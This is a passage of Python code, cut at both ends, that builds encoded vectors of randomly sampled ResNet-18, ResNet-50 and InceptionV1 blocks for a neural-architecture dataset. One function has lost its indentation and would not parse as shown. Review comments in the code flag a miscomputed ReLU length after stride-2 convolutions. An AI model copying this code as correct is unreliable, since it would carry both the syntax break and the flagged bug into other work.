return self.layer_num - 1,last_layer_input_size #返回该线性序列的最后一个节点的索引号
    def make_resnet18_block(self,last_block_index,input_size,final_output_size):
        '''
        Append one ResNet-18 basic residual block: a "left" main path and a
        "right" shortcut path, joined by an element-wise add and a final ReLU.

        stride=2 -> in_height == 2*out_height: both paths are present
        (left): Sequential(
        (0): Conv2d(inp, otp, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
        (1): BatchNorm2d(otp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        (2): ReLU(inplace=True)
        (3): Conv2d(otp, otp, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
        (4): BatchNorm2d(otp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        )
        (right): Sequential(
        (0): Conv2d(inp, otp, kernel_size=(1, 1), stride=(2, 2), bias=False)
        (1): BatchNorm2d(otp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        (2): ReLU()
        stride=1 -> in_height == out_height: left path, plus an optional right path
        (left): Sequential(
        (0): Conv2d(inp, inp, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
        (1): BatchNorm2d(inp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        (2): ReLU(inplace=True)
        (3): Conv2d(inp, inp, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
        (4): BatchNorm2d(inp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        )
        # optional (~30% probability)
        (right): Sequential(
        (0): Conv2d(inp, inp, kernel_size=(1, 1), stride=(1, 1), bias=False)
        (1): BatchNorm2d(otp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        (2): ReLU()
        )
        (relu): ReLU(inplace=True)

        Returns (index of the last appended node, its output size).
        '''
        in_channel,in_height = input_size[1],input_size[2]
        # Randomly choose output channels (80% keep, 20% double); shrink if too wide.
        out_channel = self.prob_random([in_channel,int(in_channel*2)],[0.8,0.2])
        if out_channel > 1000:
            out_channel = self.prob_random([in_channel,int(in_channel/2),int(in_channel/3)],[0.05,0.7,0.25])
        out_height = final_output_size[2]
        if in_height == out_height:
            right_res_id = self.layer_num - 1  # default shortcut: the block input itself
            # add left #1 conv2d (3x3, stride 1)
            in_channel = input_size[1]
            conv_params = [in_channel,in_channel, 3,3, 1,1, 1,1, 1,1, 1]
            params = input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,input_size)
            params = input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[last_block_index]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add left #2 BN
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
            # add left #3 ReLU (spatial dims unchanged by the stride-1 conv)
            length = last_layer_input_size[1]
            for i in range(2,len(input_size)):
                length *= input_size[i]
            params = [1,length] + [0,0,1,0]
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [22] # append to the layer-id list
            self.layer_num += 1
            # add left #4 conv2d (3x3, stride 1)
            conv_params = [in_channel,in_channel, 3,3, 1,1, 1,1, 1,1, 1]
            params = last_layer_input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,last_layer_input_size)
            params = last_layer_input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add left #5 BN
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
            #print('left',last_layer_input_size)
            left_res_id = self.layer_num - 1
            # optionally add an explicit right (shortcut) path (~30% probability)
            if(random.randint(1,100) < 30):
                # add right #1 conv2d (1x1, stride 1)
                in_channel = input_size[1]
                conv_params = [in_channel,in_channel, 1,1, 1,1, 0,0, 1,1, 1]
                params = input_size + [0,0,0,0] + conv_params
                output_size = self.get_output_size(params,1,input_size)
                params = input_size + output_size + conv_params
                self.layer_parameters += params # append to the parameter vector
                link_list=[last_block_index]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [1] # append to the layer-id list
                self.layer_num += 1
                last_layer_input_size = output_size
                # add right #2 BN
                params = self.make_layer(16,last_layer_input_size)
                self.layer_parameters += params # append to the parameter vector
                link_list=[self.layer_num-1]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [16] # append to the layer-id list
                self.layer_num += 1
                # add right #3 ReLU
                length = last_layer_input_size[1]
                for i in range(2,len(input_size)):
                    length *= input_size[i]
                params = [1,length] + [0,0,1,0]
                self.layer_parameters += params # append to the parameter vector
                link_list=[self.layer_num-1]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [22] # append to the layer-id list
                self.layer_num += 1
                right_res_id = self.layer_num - 1
            #print('right',last_layer_input_size)
        elif in_height == 2 * out_height:
            # add left #1 conv2d (3x3, stride 2 — downsamples and changes channels)
            in_channel = input_size[1]
            conv_params = [in_channel,out_channel, 3,3, 2,2, 1,1, 1,1, 1]
            params = input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,input_size)
            params = input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[last_block_index]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add left #2 BN
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
            # add left #3 ReLU
            # NOTE(review): spatial dims come from input_size although the conv
            # above has stride 2, so the encoded length is 4x the actual tensor's
            # element count — confirm whether this is intended.
            length = last_layer_input_size[1]
            for i in range(2,len(input_size)):
                length *= input_size[i]
            params = [1,length] + [0,0,1,0]
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [22] # append to the layer-id list
            self.layer_num += 1
            # add left #4 conv2d (3x3, stride 1)
            conv_params = [out_channel,out_channel, 3,3, 1,1, 1,1, 1,1, 1]
            params = last_layer_input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,last_layer_input_size)
            params = last_layer_input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add left #5 BN
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
            left_res_id = self.layer_num - 1
            #print('left',last_layer_input_size)
            # add right #1 conv2d (1x1, stride 2 — downsampling shortcut)
            in_channel = input_size[1]
            conv_params = [in_channel,out_channel, 1,1, 2,2, 0,0, 1,1, 1]
            params = input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,input_size)
            params = input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[last_block_index]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add right #2 BN
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
            # add right #3 ReLU
            # NOTE(review): same input_size-vs-strided-output length mismatch as
            # left #3 above — confirm intended.
            length = last_layer_input_size[1]
            for i in range(2,len(input_size)):
                length *= input_size[i]
            params = [1,length] + [0,0,1,0]
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [22] # append to the layer-id list
            self.layer_num += 1
            #print('right',last_layer_input_size)
            right_res_id = self.layer_num - 1
        else:
            print('wrong')
        # add the residual (element-wise add) connection
        add_index_list = [left_res_id,right_res_id]
        params = self.make_layer(24,last_layer_input_size,add_num=len(add_index_list))
        self.layer_parameters += params # append to the parameter vector
        self.layer_link += self.get_link_vector(add_index_list,self.layer_num)
        self.layer_id += [24] # append to the layer-id list
        self.layer_num += 1
        # add the final ReLU after the add
        length = last_layer_input_size[1]
        for i in range(2,len(input_size)):
            length *= input_size[i]
        params = [1,length] + [0,0,1,0]
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num-1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [22] # append to the layer-id list
        self.layer_num += 1
        #print('resnet18block',last_layer_input_size)
        return self.layer_num - 1, last_layer_input_size
    def make_resnet50_block(self,last_block_index,input_size,final_output_size):
        '''
        Append one ResNet-50 bottleneck residual block: a bottleneck main path
        (1x1 reduce -> 3x3 -> 1x1 expand) and a downsample/shortcut path, joined
        by an element-wise add.

        stride=2 -> in_height == 2*out_height: both paths are present
        (bottleneck): Sequential(
        (0): Conv2d(inp, hidden, kernel_size=(1, 1), stride=(1, 1), bias=False)
        (1): BatchNorm2d(hidden, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        (2): ReLU(inplace=True)
        (3): Conv2d(hidden, hidden, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
        (4): BatchNorm2d(hidden, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        (5): ReLU(inplace=True)
        (6): Conv2d(hidden, otp, kernel_size=(1, 1), stride=(1, 1), bias=False)
        (7): BatchNorm2d(otp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        )
        (downsample): Sequential(
        (0): Conv2d(inp, otp, kernel_size=(1, 1), stride=(2, 2), bias=False)
        (1): BatchNorm2d(otp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        )
        (relu): ReLU(inplace=True)
        stride=1 -> in_height == out_height: main path only
        (left): Sequential(
        (0): Conv2d(inp, hidden, kernel_size=(1, 1), stride=(1, 1), bias=False)
        (1): BatchNorm2d(hidden, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        (2): ReLU(inplace=True)
        (3): Conv2d(hidden, hidden, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
        (4): BatchNorm2d(hidden, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        (5): ReLU(inplace=True)
        (6): Conv2d(hidden, inp, kernel_size=(1, 1), stride=(1, 1), bias=False)
        (7): BatchNorm2d(inp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        )
        # optional downsample path, present with ~10% probability
        (downsample): Sequential(
        (0): Conv2d(inp, inp, kernel_size=(1, 1), stride=(1, 1), bias=False)
        (1): BatchNorm2d(inp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        )
        (relu): ReLU(inplace=True)

        Returns (index of the last appended node, its output size).
        '''
        in_channel,in_height = input_size[1],input_size[2]
        # Randomly choose output channels (80% keep, 20% double); shrink if too wide.
        out_channel = self.prob_random([in_channel,int(in_channel*2)],[0.8,0.2])
        if out_channel > 1000:
            out_channel = self.prob_random([in_channel,int(in_channel/2),int(in_channel/3)],[0.05,0.7,0.25])
        out_height = final_output_size[2]
        if in_height == out_height:
            right_res_id = self.layer_num - 1  # default shortcut: the block input itself
            # bottleneck width: 1/2 or 1/4 of the input channels
            hidden = self.prob_random([int(in_channel*0.5),int(in_channel * 0.25)],[0.5,0.5])
            # add #1 conv2d (1x1 reduce: in_channel -> hidden)
            in_channel = input_size[1]
            conv_params = [in_channel,hidden, 1,1, 1,1, 0,0, 1,1, 1]
            params = input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,input_size)
            params = input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[last_block_index]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add #2 BN
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
            # add #3 ReLU (spatial dims unchanged by the 1x1 stride-1 conv)
            length = last_layer_input_size[1]
            for i in range(2,len(input_size)):
                length *= input_size[i]
            params = [1,length] + [0,0,1,0]
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [22] # append to the layer-id list
            self.layer_num += 1
            # add #4 conv2d (3x3, stride 1)
            conv_params = [hidden,hidden, 3,3, 1,1, 1,1, 1,1, 1]
            params = last_layer_input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,last_layer_input_size)
            params = last_layer_input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add #5 BN
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
            # add #6 ReLU
            length = last_layer_input_size[1]
            for i in range(2,len(input_size)):
                length *= input_size[i]
            params = [1,length] + [0,0,1,0]
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [22] # append to the layer-id list
            self.layer_num += 1
            # add #7 conv2d (1x1 expand: hidden -> in_channel, restoring width)
            conv_params = [hidden,in_channel, 1,1, 1,1, 0,0, 1,1, 1]
            params = last_layer_input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,last_layer_input_size)
            params = last_layer_input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add #8 BN
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
            left_res_id = self.layer_num - 1
            # optionally add an explicit downsample path (~10% probability)
            if(random.randint(1,100) < 10):
                # add right #1 conv2d (1x1, stride 1)
                in_channel = input_size[1]
                conv_params = [in_channel,in_channel, 1,1, 1,1, 0,0, 1,1, 1]
                params = input_size + [0,0,0,0] + conv_params
                output_size = self.get_output_size(params,1,input_size)
                params = input_size + output_size + conv_params
                self.layer_parameters += params # append to the parameter vector
                link_list=[last_block_index]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [1] # append to the layer-id list
                self.layer_num += 1
                last_layer_input_size = output_size
                # add right #2 BN
                params = self.make_layer(16,last_layer_input_size)
                self.layer_parameters += params # append to the parameter vector
                link_list=[self.layer_num-1]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [16] # append to the layer-id list
                self.layer_num += 1
                right_res_id = self.layer_num - 1
        elif in_height == 2 * out_height:
            right_res_id = self.layer_num - 1  # overwritten by the downsample path below
            # bottleneck width: 1/2, 1/3 or 1/4 of the input channels
            hidden = self.prob_random([int(in_channel*0.5),int(in_channel * 0.33),int(in_channel * 0.25)],[0.8,0.1,0.1])
            # add #1 conv2d (1x1 reduce: in_channel -> hidden)
            in_channel = input_size[1]
            conv_params = [in_channel,hidden, 1,1, 1,1, 0,0, 1,1, 1]
            params = input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,input_size)
            params = input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[last_block_index]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add #2 BN
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
            # add #3 ReLU (spatial dims unchanged by the 1x1 stride-1 conv)
            length = last_layer_input_size[1]
            for i in range(2,len(input_size)):
                length *= input_size[i]
            params = [1,length] + [0,0,1,0]
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [22] # append to the layer-id list
            self.layer_num += 1
            # add #4 conv2d (3x3, stride 2 — downsampling)
            conv_params = [hidden,hidden, 3,3, 2,2, 1,1, 1,1, 1]
            params = last_layer_input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,last_layer_input_size)
            params = last_layer_input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add #5 BN
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
            # add #6 ReLU
            # NOTE(review): spatial dims come from input_size although the conv
            # above has stride 2, so the encoded length is 4x the actual tensor's
            # element count — confirm whether this is intended.
            length = last_layer_input_size[1]
            for i in range(2,len(input_size)):
                length *= input_size[i]
            params = [1,length] + [0,0,1,0]
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [22] # append to the layer-id list
            self.layer_num += 1
            # add #7 conv2d (1x1 expand: hidden -> out_channel)
            conv_params = [hidden,out_channel, 1,1, 1,1, 0,0, 1,1, 1]
            params = last_layer_input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,last_layer_input_size)
            params = last_layer_input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add #8 BN
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
            left_res_id = self.layer_num - 1
            # add right #1 conv2d (1x1, stride 2 — downsampling shortcut)
            in_channel = input_size[1]
            conv_params = [in_channel,out_channel, 1,1, 2,2, 0,0, 1,1, 1]
            params = input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,input_size)
            params = input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[last_block_index]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add right #2 BN
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
            right_res_id = self.layer_num - 1
        else:
            print('wrong')
        # add the residual (element-wise add) connection
        add_index_list = [left_res_id,right_res_id]
        params = self.make_layer(24,last_layer_input_size,add_num=len(add_index_list))
        self.layer_parameters += params # append to the parameter vector
        self.layer_link += self.get_link_vector(add_index_list,self.layer_num)
        self.layer_id += [24] # append to the layer-id list
        self.layer_num += 1
        #print('resnet50block',last_layer_input_size)
        return self.layer_num - 1,last_layer_input_size
    def make_inceptionV1_pre(self,last_block_index,input_size,final_output_size):
        '''
        Encode the InceptionV1 stem (initial layers). Mirrors:
            nn.Conv2d(in_channels=3,out_channels=64,kernel_size=7,stride=2,padding=3),
            nn.BatchNorm2d(64),
            nn.MaxPool2d(kernel_size=3,stride=2, padding=1),
            nn.Conv2d(in_channels=64, out_channels=64, kernel_size=1, stride=1),
            nn.BatchNorm2d(64),
        producing e.g. [1, 64, 56, 56].

        Each layer is appended to self.layer_parameters / self.layer_link /
        self.layer_id and self.layer_num is advanced once per layer.

        last_block_index: graph index of the node this stem attaches to.
        input_size: incoming tensor size, [batch, channel, H, W].
        final_output_size: target size; here only used as a placeholder in
            one intermediate parameter vector (see NOTE below).
        Returns (index of the last appended layer, its output size).
        '''
        last_layer_input_size = input_size
        # layer 1: 7x7 conv, stride 2, padding 3
        in_channel = input_size[1]
        out_channel = random.randint(56,72)  # randomized around the canonical 64 channels
        conv_params = [in_channel,out_channel, 7,7, 2,2, 3,3, 1,1, 1]
        # first pass with zeroed output-size fields, only to compute the real output size
        params = input_size + [0,0,0,0] + conv_params
        output_size = self.get_output_size(params,1,input_size)
        params = input_size + output_size + conv_params
        self.layer_parameters += params # append to the parameter vector
        link_list=[last_block_index]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [1] # append to the layer-id list
        self.layer_num += 1
        last_layer_input_size = output_size
        # layer 2: BatchNorm2d
        params = self.make_layer(16,last_layer_input_size)
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num-1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [16] # append to the layer-id list
        self.layer_num += 1
        # layer 3: 3x3 max pool, stride 2, padding 1
        pooling_params = [3,3, 2,2, 1,1, 1,1, 0]
        params = last_layer_input_size + [0,0,0,0] + pooling_params
        output_size = self.get_output_size(params,7,last_layer_input_size)
        params = last_layer_input_size + output_size + pooling_params
        self.layer_parameters += params # append to the parameter vector
        link_list = [self.layer_num-1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [7] # append to the layer-id list
        self.layer_num += 1
        last_layer_input_size = output_size
        # layer 4: 1x1 conv keeping the channel count
        in_channel = input_size[1]  # NOTE(review): assigned but never used; conv_params below uses out_channel — confirm intent
        conv_params = [out_channel,out_channel, 1,1, 1,1, 0,0, 1,1, 1]
        # NOTE(review): final_output_size is only a placeholder here; the vector is
        # rebuilt with the computed output size two lines below
        params = last_layer_input_size + final_output_size + conv_params
        output_size = self.get_output_size(params,1,last_layer_input_size)
        params = last_layer_input_size + output_size + conv_params
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num-1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [1] # append to the layer-id list
        self.layer_num += 1
        last_layer_input_size = output_size
        # layer 5: BatchNorm2d
        params = self.make_layer(16,last_layer_input_size)
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num-1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [16] # append to the layer-id list
        self.layer_num += 1
        #print('inceptionpre',last_layer_input_size)
        return self.layer_num - 1, last_layer_input_size # index of the last node of this linear sequence
def make_inceptionV1_block2(self,last_block_index,input_size,final_output_size):
'''
inceptionV1 block2
nn.Conv2d(in_channels=inp, out_channels=otp, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(otp),
nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
'''
#加入 #1 conv2d
in_channel = input_size[1]
out_channel = self.prob_random([int(in_channel),int(in_channel*2),int(in_channel*3)],[0.8,0.1,0.1])
if out_channel > 1000:
out_channel = self.prob_random([int(in_channel/2),int(in_channel/3)],[0.8,0.2])
conv_params = [in_channel,out_channel, 3,3, 1,1, 1,1, 1,1, 1]
params = input_size + final_output_size + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #3 pooling
pooling_params = [3,3, 2,2, 1,1, 1,1, 0]
params = last_layer_input_size + [0,0,0,0] + pooling_params
output_size = self.get_output_size(params,7,last_layer_input_size)
params = last_layer_input_size + output_size + pooling_params
self.layer_parameters += params #加入参数向量中
link_list = [self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [7] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#print('make_inceptionV1_block2',last_layer_input_size)
return self.layer_num - 1, last_layer_input_size
    def make_inceptionV1_block(self,last_block_index,input_size,final_output_size):
        '''
        Encode one InceptionV1 module (intended for channel counts > 200). Mirrors:
        InceptionV1Module
        self.branch1 = ConvBNReLU(in_channels=inp,out_channels=out_channels1,kernel_size=1)
        self.branch2 = nn.Sequential(ConvBNReLU(in_channels=inp,out_channels=out_channels2reduce,kernel_size=1),
        ConvBNReLU(in_channels=out_channels2reduce,out_channels=out_channels2,kernel_size=3))
        self.branch3 = nn.Sequential(ConvBNReLU(in_channels=inp, out_channels=out_channels3reduce, kernel_size=1),
        ConvBNReLU(in_channels=out_channels3reduce, out_channels=out_channels3, kernel_size=5))
        self.branch4 = nn.Sequential(nn.MaxPool2d(kernel_size=3,stride=1,padding=1),
        ConvBNReLU(in_channels=inp, out_channels=out_channels4, kernel_size=1))
        ConvBNReLU(in_channels,out_channels,kernel_size):
        return nn.Sequential(
        nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=1,padding=kernel_size//2),
        nn.BatchNorm2d(out_channels),
        nn.ReLU6(inplace=True)
        )
        nn.MaxPool2d(kernel_size=3, stride=2, padding=1), # appended when the spatial size must halve

        The four branch outputs are concatenated (layer id 23); a stride-2
        max pool is appended afterwards when final_output_size halves the
        spatial resolution. All layers go into self.layer_parameters /
        self.layer_link / self.layer_id, advancing self.layer_num.
        Returns (index of the last appended layer, its output size);
        see NOTE at the bottom about the unsupported-size path.
        '''
        in_channel = input_size[1]
        out_channel = final_output_size[1]
        # block_type = self.prob_random([1,2,3,4,5,6,7,8,9],[0.08,0.06,0.11,0.14,0.16,0.12,0.08,0.15,0.1])
        if in_channel > 800:
            # cap the working channel count so the sampled branch widths stay small
            in_channel = int(in_channel/2)
        # sample the four branch output widths and the two reduce widths
        out_channel_1 = random.randint(int(in_channel/4),int(in_channel/2))
        out_channel_2 = random.randint(int(in_channel*0.33),int(in_channel*0.66))
        out_channel_2_hidden = self.prob_random([int(out_channel_2*0.2),int(out_channel_2*0.5)],[0.5,0.5])
        out_channel_3 = random.randint(int(in_channel*0.1),int(in_channel*0.375))
        out_channel_3_hidden = self.prob_random([int(out_channel_3/2),int(out_channel_3/3),int(out_channel_3/4)],[0.33,0.33,0.34])
        out_channel_4 = random.randint(int(in_channel/4),int(in_channel/2))
        #1.333
        # if block_type == 1:
        #     out_channel_1 = int(in_channel/3)
        #     out_channel_2 = int(in_channel/3) * 2
        #     out_channel_2_hidden = int(out_channel_2/2)
        #     out_channel_3 = int(in_channel/6)
        #     out_channel_3_hidden = int(out_channel_3/2)
        #     out_channel_4 = int(in_channel/6)
        # #1.875
        # elif block_type == 2:
        #     out_channel_1 = int(in_channel/2)
        #     out_channel_2 = int(in_channel * 0.75)
        #     out_channel_2_hidden = int(in_channel/2)
        #     out_channel_3 = int(in_channel* 0.375)
        #     out_channel_3_hidden = int(out_channel_3/3)
        #     out_channel_4 = int(in_channel/4)
        # #1.067
        # elif block_type == 3:
        #     out_channel_1 = int(in_channel*0.4)
        #     out_channel_2 = int(in_channel * 0.43)
        #     out_channel_2_hidden = int(in_channel * 0.2)
        #     out_channel_3 = int(in_channel* 0.1)
        #     out_channel_3_hidden = int(out_channel_3/3)
        #     out_channel_4 = int(in_channel * 0.133)
        # #1
        # elif block_type == 4:
        #     out_channel_1 = int(in_channel*0.3125)
        #     out_channel_2 = int(in_channel * 0.4375)
        #     out_channel_2_hidden = int(out_channel_2/2)
        #     out_channel_3 = int(in_channel* 0.125)
        #     out_channel_3_hidden = int(out_channel_3 * 0.375)
        #     out_channel_4 = int(in_channel*0.125)
        # #1
        # elif block_type == 5:
        #     out_channel_1 = int(in_channel*0.25)
        #     out_channel_2 = int(in_channel * 0.5)
        #     out_channel_2_hidden = int(out_channel_2/2)
        #     out_channel_3 = int(in_channel* 0.125)
        #     out_channel_3_hidden = int(out_channel_3 * 0.375)
        #     out_channel_4 = int(in_channel*0.125)
        # #1.03125
        # elif block_type == 6:
        #     out_channel_1 = int(in_channel*0.21875)
        #     out_channel_2 = int(in_channel * 0.5625)
